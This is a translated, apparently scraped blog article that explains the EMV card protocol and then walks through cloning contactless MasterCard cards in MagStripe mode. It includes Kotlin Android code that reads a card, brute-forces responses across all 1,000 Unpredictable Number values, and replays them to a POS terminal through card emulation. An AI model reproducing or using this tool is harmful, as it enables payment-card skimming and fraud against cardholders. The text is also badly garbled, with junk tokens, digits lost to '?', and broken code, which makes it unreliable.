It was always interesting to see what was going on with a bank card under the hood. How the bank card and POS terminal communication protocol is implemented, how it works and how secure it is. This opportunity appeared before me when I was an intern at Digital Security. As a result, when analyzing one known EMV card vulnerability in MagStripe mode, it was decided to implement a mobile application that is able to communicate with the terminal via a contactless interface, using its own commands and detailed analysis of requests and responses. And also try to implement a method of cloning MasterCard cards in MagStripe mode. 3r33795.  3r3805. In this article I will try to describe what an EMV card is, how it works and how using Android you can try to clone your MasterCard card. 3r33795.  3r3805. 3r33795.  3r3805. 3r33336. 3r33512. “There are some things that can't buy. For everything else, there's MasterCard » [/b] 3r33337. 3r33795.  3r3805. 3r33795.  3r3805. 3r33333. What is an EMV card? 3r33333. 3r33795.  3r3805. EMV is an international standard for bank cards with a chip. 3r33512 participated in the development of this standard. E 3r33513. uropay + M 3r3-3513. asterCard + V 3r3-3513. ISA, hence the name. Let's try to figure out how all the same card communicates with the POS-terminal on a contactless interface. Tag-Length-Value those. the name of the tag is transmitted in hexadecimal, its length and the value itself. All commands are described of course in 3r380. Documentation 3r3798. and look something like this:
 3r3805. 3r33795.  3r3805. 3r3386. 3r33795.  3r3805. 3r33795.  3r3805. The standard EMV transaction goes through several stages, I will describe the full interaction algorithm in the case of a contact interface, the algorithm is somewhat shortened for a contactless interface: 3r337959.  3r3805. 3r33795.  3r3805.
 3r3805.
Application selection; 3r33473.  3r3805.
Initialization of application processing; 3r33473.  3r3805.
Read application data; 3r33473.  3r3805.
Offline authentication; 3r33473.  3r3805.
Handling restrictions; 3r33473.  3r3805.
Check card holder; 3r33473.  3r3805.
Risk management on the side of the terminal; 3r33473.  3r3805.
Analysis of terminal actions; 3r33473.  3r3805.
Risk management on the side of the card; 3r33473.  3r3805.
Analysis of card actions; 3r33473.  3r3805.
On-line processing; 3r33473.  3r3805.
Completion of the operation. 3r33473.  3r3805.
3r33795.  3r3805. 3r33795.  3r3805. 3r33795.  3r3805. Briefly consider each operation. 3r33795.  3r3805. 3r33795.  3r3805. Select an application. It often happens that there can be several applications on one map. For example, a bank card and a ticket. And the terminal somehow needs to figure out where and which algorithm to use. To select an application, the so-called Application Identification Codes are used (3r-3512. Application Identifier - AID 3r-3513.). To understand this, the terminal sends the command 3r33512. SELECT 3r3135. . For example, 3r33512. AID 3r31313. Visa Classic cards will look like this: 3r33535. A0000000031010 3r33535. . If several such codes come in response and the terminal is able to work with several applications, the terminal will display a list and prompt you to select the application we need. If the terminal does not support any of the application codes, then the operation will be rejected by the terminal. 3r33795.  3r3805. 3r33795.  3r3805. Initialization processing application. Here, the geographical location is checked first. For example, Maestro Momentum cards can work for payment only in Russia. This stage was made in order to provide issuers with the opportunity to apply existing online risk management methods when conducting offline operations. At this stage, an EMV transaction can be canceled at the initiative of the card itself, if this type of operation is prohibited in this country of the world by the issuer. Further, the card transmits to the terminal a set of specially structured information containing a description of the card and application functionality. 3r33795.  3r3805. 3r33795.  3r3805. Read application data. The terminal transmits various card data necessary for the transaction, for example, card number, expiration date, transaction counter and a lot of other data. Some of them will be discussed below. 3r33795.  3r3805. 3r33795.  3r3805. Sample dаta: 3r33795.  3r3805. 3r33795.  3r3805. 3r33795.  3r3805. 3r33795.  3r3805. The certificate of the public key of the issuer's bank and the card itself is also transferred. In order for the terminal to be able to verify the digital signature of some card data, it is used 3-353512. PKI Infrastructure 3-333513. (Public Key Infrastructure). In short, the payment system has a pair of keys - public and private, and the payment system is for all participants 3r-3512. CA (Center Authority) . In essence, the payment system for each issuer bank issues a new key pair, and at the same time forms the public key certificate of the issuing bank, signing it with the CA private key. Further, when the bank issues a new card, it accordingly generates a pair of keys for the card, and also forms a certificate of the public key of the card, signing it with the help of the bank's private key. In terminals, a public key certificate is usually sewn for various payment systems. Thus, when the card transmits the public key certificate of the issuing bank and the certificate of the card itself, the terminal can easily check the entire chain using the public key of the payment system. Using the public key of the payment system, the terminal first checks the authenticity of the issuer's bank certificate, if it is genuine, then it can be trusted and now with the help of the issuer's bank certificate you can verify the certificate of the card itself. More detail in article 3r3178. about security EMV
3r33795.  3r3805. 3r33795.  3r3805. Offline authentication. The terminal determines the type of method supported offline authentication. There is a static (3r33512. Static Data Authentication - SDA 3r-331313.), Dynamic (3r-?235. Dynamic Data Authentication - DDA 3r3- 3513.) And a combined (3r?335. Combined Data Authentication - CDA ). These methods are also PKI based. 3r33512. SDA 3r33513. This is simply signed data on the private key of the issuing bank, 3-33512. DDA 3r31313. - the terminal sends some random number and the card must sign it using its private key, and the terminal will verify this signature using the card certificate obtained earlier, thus the terminal is to make sure that the card really has a private key - hence it is genuine. 3r33512. CDA 3r33513. it's just a combination of both. 3r33795.  3r3805. 3r33795.  3r3805. Handling restrictions. Here the terminal checks the previously obtained data from the card for a condition of suitability for this operation. For example, it checks the start /end date of the application of 3r33512. Application Expiration Date (Tag '5F24') [/b] and 3r33512. Application Effective Date (Tag '5F25') 3r31335. . The application version is also checked. The results of operations conducted at this stage are also recorded in the report 3-33512. TVR (Terminal verification results) 3r3353513. . As a result of this phase, the transaction cannot be canceled, even if, for example, the application has expired. 3r33795.  3r3805. 3r33795.  3r3805. Check card holder. Verification of the cardholder is made in order to authenticate the person who submitted the card and to verify whether he is the true owner of the card. The EMV standard provides various cardholder verification methods (3r3512. Cardholder Verification Method 3r?513.). Verification methods are defined both on the terminal and on the map. They are contained in the so-called 3r33512. CVM lists 3–3–3513. . In the course of execution, the terminal and the card compare the received CVM sheets and select the general verification method. List of supported verification methods:
 3r3805.
 3r3805.
No CVM required (‘011111’b); 3r33473.  3r3805.
Fail CVM processing (‘000000’b); 3r33473.  3r3805.
Signature (‘011110’b); 3r33473.  3r3805.
Enciphered PIN verified online (‘000010’b); 3r33473.  3r3805.
Plaintext PIN verification performed by ICC (‘000001’b); 3r33473.  3r3805.
ICC and signature (‘000011’b); 3r33473.  3r3805.
ICC (‘000100’b) Enciphered PIN verification; 3r33473.  3r3805.
ICC (‘000100’b) Enciphered PIN verification performed. 3r33473.  3r3805.
3r33795.  3r3805. Here is here There is also interesting information on this topic. 3r33795.  3r3805. 3r33795.  3r3805. Risk management on the side of the terminal. At this stage, the terminal conducts an internal check of the parameters of the transaction, based on the settings of the risk management of the acquiring bank. Risk management procedures can be performed by the terminal at any time between the completion of the process of reading the card data and the terminal generating the first command 3333512. GENERATE AC [/b] . Terminal-side risk management includes three mechanisms: 3r33795.  3r3805. 3r33795.  3r3805.
 3r3805.
control of the size of operations performed on the map (3r33512. Floor Limit Checking 3r3-3513.); 3r33473.  3r3805.
random selection of transactions for online authorization of this transaction by the issuer (3r33512. Random Transaction Selection 3r33513.); 3r33473.  3r3805.
check offline activity using the card (3r33512. Velocity Checking 3r3-33513.). 3r33473.  3r3805.
3r33795.  3r3805. 3r33795.  3r3805. Analysis of terminal actions. At this stage, the terminal analyzes the results of the previous steps of the transaction. Based on the results of the analysis, the terminal decides whether to conduct the operation online, allow it to be conducted offline or reject the operation. 3r33795.  3r3805. 3r33795.  3r3805. Risk management on the side of the card. The map, receiving from the team 3r33512. GENERATE AC [/b] The data relating to the transaction, the terminal, and the results of the terminal checks, in turn, performs its own risk management procedures and makes its own decision about how to complete the operation. 3r33795.  3r3805. 3r33795.  3r3805. Analysis of card actions. At this stage, the card completes the implementation of risk management procedures and generates a response cryptogram for the terminal. If the card decides to approve a transaction, then 3r33512 is formed. Transaction Certificate 3r3ir3513. . If the card decides to perform the operation in real time, then it forms 3r33512. ARQC (Authorization Request Cryptogram) [/b] . If the card uses alternative authorization methods, then 3r3512 is used. Application Authorization Referral [/b] . In case the card rejects the transaction, then 3r33512. Application Authentication Cryptogram [/b] . 3r33795.  3r3805. 3r33795.  3r3805. Another cryptogram 3r33512. ARPC (Authorization Response Cryptogram) [/b] need to authenticate the issuer. The issuer generates an ARPC cryptogram and sends the cryptogram to the card, if the card confirms the received cryptogram, then the issuer is authenticated by the card. 3r33795.  3r3805. 3r33795.  3r3805. A little about the security of keys and mutual authentication of the card and the issuer from the book of I. M. Goldovsky: 3r3307. The point of mutual authentication is that the card and the terminal authenticate each other using the ARQC and ARPC cryptograms authentication. Cryptograms are data generated using a secret key (which is known to the card and the bank to the issuer), transaction numbers, a random number generated by the terminal, as well as some transaction details, a terminal and a card. In the case of ARPC, the authorization response code of the issuer is added to the listed data. Without knowing the secret key of the card to generate a cryptogram, it is impossible to calculate ARQC /ARPC values ​​in the foreseeable time with the current level of technology, and therefore the fact of their successful verification indicatescard and issuer. Online authentication is the most reliable way to authenticate a card. This is due to the fact that it is executed directly by the issuer, without an intermediary in the form of a terminal. In addition, for online authentication, the 3DES algorithm with a 112-bit temporary key is used, the cryptographic strength of which corresponds to that of the RSA algorithm with the asymmetric key modulus length used for offline authentication of the card's application over 1700 bits. The use of asymmetric keys of such length on the card is still quite rare. Keys with a length of 102? 115? or 1408 bits are commonly used. 3r3308. 3r33795.  3r3805. 3r33795.  3r3805. Ultimately, the online transaction goes through the chain: 3r3373795.  3r3805. 3r33512. Map <--> POS-Terminal <--> Bank Acquirer <--> Payment System <--> Bank Issuer. 3r? 3513. 3r33795.  3r3805. 3r33795.  3r3805. 3r33795.  3r3805. 3r33795.  3r3805. 3r33333. We clone MasterCard in MagStripe mode. 3r33333. 3r33795.  3r3805. We proceed directly to the principle of cloning. This method of attacking contactless cards was published by two researchers Michael Roland, Josef Langer from the Austrian University. It is based on a general principle called Skimming . This is a scenario in which an attacker steals money from a bank card by reading (copying) information from this card. In general, it is important to keep the PIN secret and not to allow it to leak. But in the method of the Austrian guys, we don’t need to know this. Payment card cloning is performed successfully for the kernel version of the EMV Contactless Kernel 2 application. The version of this protocol supports two modes of operation for contactless cards: EMV protocol 3r3512. (MasterCard PayPass M /Chip) 3r33535. and 3r33512. MagStripe (MasterCard PayPass MagStripe) [/b] mode. 3r33795.  3r3805. 3r33795.  3r3805. 3r33512. MagStripe 3-333513. - This is a mode of support for cards with a magnetic strip. This mode is implemented on MasterCard cards with a contactless interface. MagStripe mode is most likely needed for banks that find it difficult to transfer the entire infrastructure to support chipless contactless EMV transactions. By the way, Visa cards also have a similar mode of operation - 3r33512. PayWave MSD (Magnetic Stripe Data) 3r31313. . 3r33795.  3r3805. 3r33795.  3r3805. The transaction processing process for contactless cards is trimmed compared to chip cards and usually works in the following mode: 3r373795.  3r3805. 3r33795.  3r3805.
 3r3805.
The terminal sends the command 3r33512. SELECT PPSE 3-333513. (Proximity Payment System Environment). The card sends a list of supported applications. 3r33473.  3r3805.
The terminal sends the command 3r33512. SELECT 3r3135. . In response, receives the necessary details of the application. 3r33473.  3r3805.
The terminal sends the command 3r33512. GET_PROCESSING_OPTIONS [/b] . The card answers what type of authentication it supports and whether there is verification of the cardholder there. 3r33473.  3r3805.
The terminal sends the command 3r33512. READ_RECORDS [/b] . The card in response sends Track1 and Track2 almost the same as that recorded on the magnetic stripe of the card. 3r33473.  3r3805.
The terminal sends the command 3r33512. COMPUTE_CRYPTOGRAPHIC_CHECKSUM 3r3-3513. . Which means that the card should, based on the transmitted Unpredictable Number, generate the value of CVC3. 3r33473.  3r3805. 3r33475. 3r33795.  3r3805. 3r33795.  3r3805. 3r33333. 3r33795.  3r3805. 3r33795.  3r3805. 3r33395.
How does all this look in real life? 3r? 3513.
It looks like 3r3407. APDU
teams. 3r3013. List of all tags
3r33795.  3r3805. APDU - Application Protocol Data Unit - this is a symbol of a frame with a command map or card response. 3r33795.  3r3805. On Habré there are a couple of articles on this topic 3r3407. here is 3r3798. and 3r3409. here is 3r3798. 3r33795.  3r3805. 3r3r6806. 3r3r6806. 3r33795.  3r3805. The card supports the special COMPUTE CRYPTOGRAPHIC CHECKSUM command, whose argument is the data defined in the Unpredictable Number Data Object (UDOL) object. 3r33512. As a result, the card uses the 3DES algorithm and the secret key to calculate the CVC3 (Card Verification Code) dynamic value. 3r? 3513. The 3DES function concatenates UDOL data and transaction counters (Application Transaction Counter, ATC) as an argument. 3r33512. Therefore, the value of CVC3 always depends on UN and ATC objects. 3r? 3513. 3r33795.  3r3805. 3r33795.  3r3805. In other words, this command is necessary for the card to generate a kind of “signature” in order for the issuer to verify the card. However, in this signature there is no signature of the transaction itself. The signature contains the values ​​3r33512. ATC - 2 bytes [/b] , 3r33512. CVC3 (Track1) - 2 bytes 3r33513. , 3r33512. CVC3 (Track2) - 2 bytes 3r33513. that are generated by the card based on the secret key that the issuing bank and transaction counter (ATC) also know. At the same time, the POS terminal informs the card 3r33512 for generating the signature. UN (Unpredictable Number) [/b] - 4 bytes, which is also used in signature generation. Unpredictable Number prevents the formation of authentication codes on a real card for later use in fraudulent transactions. The UN is strongly hampered by the attack, since it is not possible to iterate over 4 bytes without going beyond the transaction counter. However, there are some weaknesses in the specification of this. 3r33795.  3r3805. 3r33795.  3r3805. First, the specification restricts UN to the encoding of numbers, namely 3r3437. Binary Decimal Code (BCD)
that in essence means that if we look at such an encoded number in HEX, then we will see only numbers from 0 to ? all other values ​​are considered as forbidden. Thus, the number of UN is reduced from ?29?96?295 to 9?99?999. 3r33795.  3r3805. 3r33795.  3r3805. Secondly, the number of significant digits UN is determined by the map. Thus, depending on the special parameters in the tracks, the number of digits in the UN can be from 10 to 1?00? depending on the type of card, in practice, the most common is 1000 values. 3r33795.  3r3805. 3r33795.  3r3805. 3r33512. Thus, the attack plan is as follows: 3r33513. 3r33795.  3r3805. 3r33795.  3r3805.
 3r3805.
We read the card and find out the number of significant digits from the UN, which will be provided by the terminal 3r-3473.  3r3805.
We iterate over all UN, we get all possible values ​​of the function 3r33512. COMPUTE_CRYPTOGRAHIC_CHECKSUM 3r3-3513. , save them in the appropriate table with the UN -> Result
mapping.  3r3805.
We bring to the POS-terminal, find out the number that the POS-terminal asks for. 3r33473.  3r3805.
We select the desired result from the table and substitute it in response to the terminal. 3r33473.  3r3805.
The transaction goes away. 3r33473.  3r3805.
PROFIT. But the success of the approval of the transaction is not guaranteed, since the issuer bank may reject such a transaction. 3r33473.  3r3805. 3r33475. 3r33795.  3r3805. 3r33795.  3r3805. 3r38080. 3r33795.  3r3805. 3r33795.  3r3805. It is also worth noting that the transaction counter (ATC) prevents the reuse of previously used authentication codes, which means that if we used such an attack, you need to copy the card again, because the transaction counter was already used to obtain information and was used in the signature, which means that if we had a transaction counter of 100? and then sent the transaction to the bank, the bank will no longer accept transactions with a counter below 3r3485.  3r3805. 3r33795.  3r3805. In most cases, the data transferred from the card is static for all transactions. Of course, except 3r33512. COMPUTE_CRYPTOGRAPHIC_CHECKSUM 3r3-3513. . To generate a dynamic CVC3 code, the map application must be read by the command 3r-3512. SELECT 3r3135. then 3r33512. GET_PROCESSING_OPTIONS [/b] , and only then COMPUTE_CRYPTOGRACHIC_CHECKSUM and this is quite an important point. These three commands are required to generate CVC3. According to the experiment using only these three commands, 3r3512. busting 1000 values ​​on the Google Galaxy Nexus S took just one minute. 3r? 3513. 3r33795.  3r3805. 3r33795.  3r3805. For work with the terminal and the card the program 3r3512 was used. Terminal Simulator [/b] from MasterCard. It works great with various NFC readers and smart card readers. In addition, it is absolutely free. It allows you to test cards with different settings of the POS terminal and maintains a detailed log of all requests from the terminal and card responses. It can also be used to test an application on a phone operating in card mode. 3r33795.  3r3805. 3r33795.  3r3805. 3r33795.  3r3805. For reading the card, the NFC reader 3r33512 was used. ACR122 3r3-33513. . 3r33795.  3r3805. 3r? 3516. 3r33795.  3r3805. 3r33795.  3r3805. Now let's try to convert all this into code. The application will be written in the Kotlin language for Android. First we will try to describe the general structure of the team. 3r33795.  3r3805.
data class Command (
var CLA: String = 0x00.toString (),
var INS: String = 0x00.toString (),
var P1: String = "",
var P2: String = "",
Var Lc: String = "",
Var Nc: String = "",
Var Le: String = ""
Var Nr: String = "",
Var SW1WS2: String = ""
.) {
fun split (): ByteArray {
return getHexString (). hexToByteArray ()
}
3r3805. fun getHexString () = CLA.plus (INS) .plus (P1) .plus (P2) .plus (Lc) .plus (Nc) .plus (Le) .plus (Nr) .plus (SW1WS2)
}
3r3758. 3r3759. 3r33795.  3r3805. First we need to set up work with NFC. On the phone, we can work in two modes. In card mode, this is when we respond to commands from the terminal, and in terminal mode when we send commands and read, for example, cards. Those. at first we can clone the map, and then make sure that we respond to requests from the terminal with already prepared commands. 3r33795.  3r3805. Further simplified implementation of interaction with NFC:
 3r3805. 3r33795.  3r3805.
private var nfcAdapter: NfcAdapter? = null /*! 3r33554. private var tag: Tag? = null /*! 3r33555. private lateinit var tagcomm: IsoDep /*! 3r33556. private val nfctechfilter = arrayOf (arrayOf (NfcA :: class.java.name)) /*! 3r33557. private var nfcintent: PendingIntent? = null
3r3805. override fun onCreate (savedInstanceState: Bundle?) {
super.onCreate (savedInstanceState)
setContentView (R.layout.activity_main)
nfcAdapter = NfcAdapter.getDefaultAdapter (this)
nfcintent = PendingIntent.getActivity (this, ? Intent (this, javaClass) .addFlags (Intent.FLAG_ACTIVITY_SINGLE_TOP), 0)
cardEmulation = CardEmulation.getInstance (nfcAdapter)
nfcAdapter? .enableForegroundDispatch (this, nfcintent, null, nfctechfilter)
}
3r3805. 3r3805. override fun onNewIntent (intent: Intent) {
super.onNewIntent (intent)
tag = intent.getParcelableExtra (NfcAdapter.EXTRA_TAG)
cardReading (tag)
}
3r3805. override fun onResume () {
super.onResume ()
if (canSetPreferredCardEmulationService ()) {
this.cardEmulation? .setPreferredService (this, ComponentName (this, "com.nooan.cardpaypass.NfcService")); 3r3805.}
}
3r3805. override fun onpause () {
if (canSetPreferredCardEmulationService ()) {
this.cardEmulation? .unsetPreferredService (this)
}
super.onpause ()
}
private fun cardReading (tag: tag?) {
tagcomm = IsoDep.get (tag)
try {
tagcomm.connect ()
} catch (e: IOException) {
error = "Reading card data Error tagcomm:" + e.message
Toast.makeText (applicationContext, error, Toast.LENGTH_SHORT) .show ()
return
}
3r3805. try {
when {3r3805. commands! = null -> readCardWithOurCommands ()
mChip -> readCardMChip ()
else -> readCardMagStripe ()
}
} catch (e: IOException) {
error = "Reading card data Error tranceive:" + e.message
Toast.makeText (applicationContext, error, Toast.LENGTH_SHORT) .show ()
return
} finally {3r3805. tagcomm.close ()
}
}
protected fun execute (command: Command, log: Boolean): ByteArray {
val bytes = command.split ()
listLogs.add (bytes.toHex ())
val recv = tagcomm.transceive (bytes)
listLogs.add (recv.toHex ())
return recv
}
3r3758. 3r3759. 3r33795.  3r3805. Here we describe the sequence of commands and enumeration of the Unpredictable Number values ​​in the cycle from 0 to 99? change the Nc command to “00000 $ {String.format ("% 03d ", i)}". "Replace (" (?! $ ) ". toRegex ()," $ 0 "). And do not forget to perform GET_PROCESSING_OPTIONS each time before COMPUTE_CRYPTOGRAPHIC_CHECKSUM, otherwise the check amount will not be counted. 3r33795.  3r3805. 3r33795.  3r3805. As a result, all this can be written to a file and used already when working with a real terminal. Here we get the name and card number, we can display it on the screen. 3r33795.  3r3805. 3r33795.  3r3805.
private fun readCardMagStripe () {
try {
var response = execute (Commands.SELECT_PPSE)
3r3805. //Based on the previous query, create a new 3r3805. val select = Commands.SELECT_APPLICATION.apply {
Nc = response.toHex (). Substring (5? 68)
SW1WS2 = "00"
}
val cardtype: String = getTypeCard (select.split ())
execute (select)
3r3805. execute (Commands.GET_PROCESSING_OPTIONS)
response = executete (Commands.READ_RECORD_1.apply {
P2 = "0C"
Lc = "00"
Le = ""
Nc = "" 3r3805.})
3r3805. if (cardtype === "MasterCard") {
3r3805. cardnumber = "Card number: $ {response.getCards ()}"
cardexpiration = "Card expiration: $ {response.getExpired ()}"
3r3805. showData () 3r3805. 3r3805. for (i in 0999) {3r3805. execute (Commands.GET_PROCESSING_OPTIONS, false)
execute (Commands.COMPUTE_CRYPTOGRAPHIC_CHECKSUM.apply {
Lc = "04"
Nc = "00000 $ {String.format ("% 03d ", i)}". To replace (" (), "$ 0")
})
}
}
finishRead ()
}
3r3758. 3r3759. 3r33795.  3r3805. A set of commands that we need. 3r33795.  3r3805.
object Commands {
val SELECT_PPSE = Command (CLA = "00", INS = "A4", P1 = "04", P2 = "00", Lc = "0E", Nc = "??? 59 2E ??? 2E ??? ??? ")
3r3805. val SELECT_APPLICATION = Command (CLA = "00", INS = "A4", P1 = "04", P2 = "00", Nc = "07")
3r3805. val GET_PROCESSING_OPTIONS = Command (CLA = "80", INS = "A8", P1 = "00", P2 = "00", Lc = "02", Nc = "???", Le = "00") 3r3805. 3r3805. val READ_RECORD_1 = Command (CLA = "00", INS = "B2", P1 = "01", P2 = "14", Lc = "00", Le = "00") 3r3805. 3r3805. val READ_RECORD_2 = Command (CLA = "00", INS = "B2", P1 = "01", P2 = "1C", Lc = "00", Le = "00") 3r3805. 3r3805. val READ_RECORD_3 = Command (CLA = "00", INS = "B2", P1 = "01", P2 = "24", Lc = "00", Le = "00") 3r3805. 3r3805. val READ_RECORD_4 = Command (CLA = "00", INS = "B2", P1 = "02", P2 = "24", Lc = "00", Le = "00") 3r3805. 3r3805. val COMPUTE_CRYPTOGRAPHIC_CHECKSUM = Command (CLA = "80", INS = "2A", P1 = "8E", P2 = "80", Le = "00") 3r3805.}
3r3758. 3r3759. 3r33795.  3r3805. 3r33795.  3r3805. To implement the wiretapping of commands from the terminal, you must start your service and declare it in the manifest. In this service, in the processCommandApdu, a command comes from the terminal, we compare it with the one that is stored in the file, and give the answer, which is written in the next line. 3r33795.  3r3805.

3r337. 3r3805. 3r33712. 3r3805. 3r33714. 3r3805. 3r33737. 3r3805. 3r33737. android: name = "android.nfc.cardemulation.host_apdu_service"
android: resource = "@ xml /apdu_config" />
3r33737. 3r3805. 3r3758. 3r3759. 3r33795.  3r3805.
class NfcService: HostApduService () {
3r3805. fun getData (context: Context?): List
{
var list: List
= arrayListOf ()
filePath? .let {
if (it.isNotBlank ()) {
list = getCommands (Uri.fromFile (File (it)). readTextFromUri (context), this :: showError)
} else {
Toast.makeText (applicationContext, "Not found file path", Toast.LENGTH_SHORT) .show ()
}
}
return list
}
3r3805. 3r3805. private var commands: List
? = arrayListOf ()
3r3805. override fun processCommandApdu (apdu: ByteArray?, bundle: Bundle?): ByteArray {
commands = getData (applicationContext)
commands? .forEachIndexed {i, command ->
if (apdu.toHex () == command.getHexString ()) {
return commands !![i+1].split ()
}
}
Log.e ("LOG", "Finnish")
return Value.magStripModeEmulated.hexToByteArray ()
} 3r3759. 3r33795.  3r3805. 3r33795.  3r3805. A couple of screenshots from the application. We read the card and the parsim log:
 3r3805. 3r33795.  3r3805. 3r33737. 3r33795.  3r3805. 3r33795.  3r3805. Thus, it is possible to simulate the work of a contactless EMV card on the phone with the card data. But fortunately or unfortunately for someone, this attack does not work in Russia. According to our experiments, the transaction all the time reached the issuing bank and was rejected by the bank itself. In addition, we could not conduct an offline transaction using MagStripe. However, such an attack may well be implemented in other countries, where using MagStripe mode is quite common and the risk management algorithm is slightly different, for example in the USA. 3r33795.  3r3805. 3r33795.  3r3805. Links with the help of which appeared this article. 3r33795.  3r3805. Bank microprocessor cards /I. M. Goldovsky - M .: TsIPSiR: Alpina Pub licherz, 2010. - 686 p. 3r33795.  3r3805. EMV-project: step by step 3r33795.  3r3805. Research Austrian researchers 3r3-3798. 3r33795.  3r3805.
Link to application code 3r3798. 3r33795.  3r3805.
Terminal Simulator. 3r33795.  3r3805. Thanks barracud4 for assistance in preparing the article. 3r3r6806. 3r3805. 3r3805. 3r3805.
! function (e) {function t (t, n) {if (! (n in e)) {for (var r, a = e.document, i = a.scripts, o = i.length; o-- ;) if (-1! == i[o].src.indexOf (t)) {r = i[o]; break} if (! r) {r = a.createElement ("script"), r.type = "text /jаvascript", r.async =! ? r.defer =! ? r.src = t, r.charset = "UTF-8"; var d = function () {var e = a.getElementsByTagName ("script")[0]; e.parentNode.insertBefore (r, e)}; "[object Opera]" == e.opera? a.addEventListener? a.addEventListener ("DOMContentLoaded", d! ): d ()}}} t ("//mediator.mail.ru/script/2820404/"""_mediator") () (); 3r3804. 3r3805. 3r3r6806.